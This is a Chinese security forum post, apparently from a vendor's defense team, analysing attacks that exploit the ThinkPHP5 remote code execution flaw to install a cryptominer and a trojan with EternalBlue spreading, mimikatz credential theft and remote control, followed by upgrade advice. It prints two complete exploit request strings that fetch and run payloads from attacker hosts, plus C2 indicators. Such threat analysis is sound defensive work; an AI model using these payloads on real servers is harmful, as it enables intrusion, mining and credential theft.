查看: 1501|回复: 2
收起左侧

[技术原创] ThinkPHP5 getshell漏洞被利用执行永恒之蓝攻击木马

[复制链接]
360主动防御
发表于 2018-12-28 17:49:48 | 显示全部楼层 |阅读模式
本帖最后由 360主动防御 于 2018-12-28 17:53 编辑



      ThinkPHP是一款基于PHP的Web应用程序开发框架,它开源并且有着广泛的流行度,据统计,目前有超过50万台服务器正运行ThinkPHP(数据来源于Think PHP官网)。
近期ThinkPHP发布了一个安全更新,用于修复未经身份验证的高风险远程代码执行(RCE)漏洞,360Cert也曾针对该漏洞发布过预警(https://cert.360.cn/warning/deta ... c92fc4e21d6cd9b1332)。而最近,我们则监测到利用这个已被披露的ThinkPHP RCE漏洞发起攻击的案例:黑客利用此漏洞在运行有未打补丁的ThinkPHP的服务器上(包含Windows、Linux)安装远控、挖矿、永恒之蓝攻击模块等。
攻击流程示意图

其一,利用ThinkPHP RCE漏洞进行挖矿:

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd /tmp;wget hxxp://205.185.113.123/ex.sh;curl hxxp://205.185.113.123/ex.sh -O;chmod 777 ex.sh;sh ex.sh
下载挖矿木马的shell脚本

其二,利用ThinkPHP RCE漏洞执行多功能综合木马:
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘hxxp://a46.bulehero.in/download.exe’,’C:/12.exe’);start C:/12.exe
被下载到本地的Download.exe为集远控、挖矿、永恒之蓝攻击等多合一的木马:

其中,挖矿模块参数如下:
挖矿模块参数
从钱包地址查看,已经有146个门罗币的进帐:
钱包地址相关信息
Download.exe中的永恒之蓝攻击模块:
永恒之蓝攻击模块


木马会获取本地IP段,并随机生成部分IP段进行永恒之蓝攻击尝试:
基于永恒之蓝模块发起的攻击

此外,木马还会调用mimikatz获取windows账号的密码:

调用mimkatz获取windows系统账号


最后,木马还带有远控模块,其上线地址为:a45[.]bulehero[.]in
远控功能模块
远控连接
360互联网安全中心提醒广大站长:
1.      将ThinkPHP升级到5.0.23或5.1.31以上的版本,以解决此问题。
2.      如果您正在使用基于ThinkPHP5的CMS(网站内容管理系统),也可能会受此漏洞影响,同样建议对其进行升级。
3.      服务器及时安装系统漏洞补丁并使用安全软件进行防护。


附:ThinkPHP相关说明的官网链接:https://blog.thinkphp.cn/869075
ThinkPHP5安全更新说明


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
wowocock
发表于 2018-12-28 18:04:07 | 显示全部楼层
不错,顶
沧桑浪子
发表于 2018-12-30 11:18:34 | 显示全部楼层
不错,顶
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-23 04:44 , Processed in 0.132754 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表